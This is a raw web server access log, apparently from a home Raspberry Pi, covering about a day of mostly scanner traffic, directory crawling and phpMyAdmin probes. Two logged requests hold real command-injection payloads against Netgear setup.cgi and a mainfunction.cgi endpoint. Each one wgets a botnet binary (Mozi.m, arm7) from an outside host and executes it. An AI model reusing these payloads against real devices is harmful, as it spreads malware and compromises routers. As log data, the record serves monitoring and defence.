Wed Apr 22 06:25:06 MDT 2020 06:25:06 up 57 days, 10:53, 1 user, load average: 0.39, 0.23, 0.22 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 57days 1:17m 2.53s /usr/bin/lxsession -s LXDE-pi -e LXDE 208.91.109.18 - - [22/Apr/2020:14:19:16 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 208.91.109.18 - - [22/Apr/2020:14:19:16 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 196.52.43.93 - - [22/Apr/2020:14:37:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36" 104.152.52.25 - - [22/Apr/2020:15:26:16 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 93.41.225.231 - - [22/Apr/2020:15:37:42 +0000] "GET / HTTP/1.1" 400 0 "" "" 71.6.232.4 - - [22/Apr/2020:15:42:14 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" 138.197.216.120 - - [22/Apr/2020:16:10:31 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 93.117.22.209 - - [22/Apr/2020:16:17:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 41.215.10.6 - - [22/Apr/2020:17:18:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 128.14.209.250 - - [22/Apr/2020:17:28:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 191.242.246.30 - - [22/Apr/2020:18:15:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 51.38.57.199 - - [22/Apr/2020:20:01:33 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 51.254.59.113 - - [22/Apr/2020:20:27:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:20 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:20 +0000] "GET /delinquent-accounts/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:21 +0000] "GET /documents/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:22 +0000] "GET /downloads/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:23 +0000] "GET /freedom/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:25 +0000] "GET /memes/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:25 +0000] "GET /music/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:26 +0000] "GET /pictures/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:27 +0000] "GET /va/ HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:27 +0000] "GET /videos/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:28 +0000] "GET /ac0xl/ac0xl/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:29 +0000] "GET /ac0xl/ac0xl/Dont-Be-Evil/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:29 +0000] "GET /ac0xl/ac0xl/illuminati/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:30 +0000] "GET /ac0xl/ac0xl/logs/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:30 +0000] "GET /ac0xl/ac0xl/www/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:31 +0000] "GET /delinquent-accounts/delinquent-accounts/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:31 +0000] "GET /delinquent-accounts/delinquent-accounts/I-Camp-RV-Park-Campground-Green-River-Utah-84525/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:32 +0000] "GET /documents/documents/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:32 +0000] "GET /downloads/downloads/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:33 +0000] "GET /downloads/downloads/4laws.com/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:33 +0000] "GET /freedom/freedom/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:35 +0000] "GET /freedom/freedom/freedom/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:35 +0000] "GET /freedom/freedom/freedom-2020-01-08/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:36 +0000] "GET /memes/memes/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:36 +0000] "GET /music/music/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:37 +0000] "GET /music/music/Songs/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:37 +0000] "GET /pictures/pictures/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:38 +0000] "GET /pictures/pictures/StMichaelTheArchangelMission/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:38 +0000] "GET /videos/videos/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:39 +0000] "GET /freedom/freedom/freedom/freedom/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [22/Apr/2020:20:27:40 +0000] "GET /freedom/freedom/freedom/freedom/thttpd-extras/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 200.95.211.10 - - [22/Apr/2020:20:28:49 +0000] "GET / HTTP/1.1" 400 0 "" "" 188.32.222.242 - - [22/Apr/2020:21:32:41 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 188.32.222.242 - - [22/Apr/2020:21:32:41 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.243.132.6 - - [22/Apr/2020:22:53:00 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 152.204.132.187 - - [22/Apr/2020:22:53:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.62.17.83 - - [22/Apr/2020:23:05:23 +0000] "GET / HTTP/1.0" 200 25000 "" "" 162.62.17.83 - - [22/Apr/2020:23:05:23 +0000] "GET / HTTP/1.0" 200 25000 "" "" 162.62.17.83 - - [22/Apr/2020:23:05:23 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.62.17.83 - - [22/Apr/2020:23:05:57 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 95.28.162.115 - - [22/Apr/2020:23:49:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 66.240.205.34 - - [22/Apr/2020:23:51:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 209.141.41.128 - - [23/Apr/2020:00:08:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 185.234.216.77 - - [23/Apr/2020:00:48:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" 87.3.195.251 - - [23/Apr/2020:01:33:01 +0000] "GET / HTTP/1.1" 400 0 "" "" 115.55.195.149 - - [23/Apr/2020:02:08:40 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.55.195.149:51067/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 0 "" "" 200.89.98.46 - - [23/Apr/2020:02:51:29 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 200.89.98.46 - - [23/Apr/2020:02:51:29 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 201.209.97.183 - - [23/Apr/2020:02:53:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 79.8.100.126 - - [23/Apr/2020:03:41:05 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 79.8.100.126 - - [23/Apr/2020:03:41:05 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 177.129.62.176 - - [23/Apr/2020:03:41:59 +0000] "GET / HTTP/1.1" 400 0 "" "" 117.102.200.193 - - [23/Apr/2020:04:09:05 +0000] "GET / HTTP/1.1" 400 0 "" "" 94.140.231.193 - - [23/Apr/2020:04:27:33 +0000] "GET / HTTP/1.1" 400 0 "" "" 104.35.24.225 - - [23/Apr/2020:04:40:10 +0000] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 104.35.24.225 - - [23/Apr/2020:04:40:10 +0000] "GET /phpMyadmin/index.php?lang=en HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 104.35.24.225 - - [23/Apr/2020:04:40:13 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.8.43.232 - - [23/Apr/2020:04:43:32 +0000] "GET / HTTP/1.1" 400 0 "" "" 188.32.222.242 - - [23/Apr/2020:04:52:34 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 188.32.222.242 - - [23/Apr/2020:04:52:35 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 181.236.224.67 - - [23/Apr/2020:07:07:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 37.152.135.196 - - [23/Apr/2020:07:33:36 +0000] "GET / HTTP/1.1" 400 0 "" "" 83.97.20.21 - - [23/Apr/2020:07:37:12 +0000] "GET / HTTP/1.0" 200 25000 "" "" 69.142.158.70 - - [23/Apr/2020:08:25:56 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 69.142.158.70 - - [23/Apr/2020:08:25:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 31.25.137.241 - - [23/Apr/2020:08:34:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 201.49.239.143 - - [23/Apr/2020:11:13:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 45.83.65.192 - - [23/Apr/2020:12:18:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" Thu Apr 23 06:25:06 MDT 2020 06:25:06 up 58 days, 10:53, 1 user, load average: 0.31, 0.27, 0.26 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 58days 1:17m 2.53s /usr/bin/lxsession -s LXDE-pi -e LXDE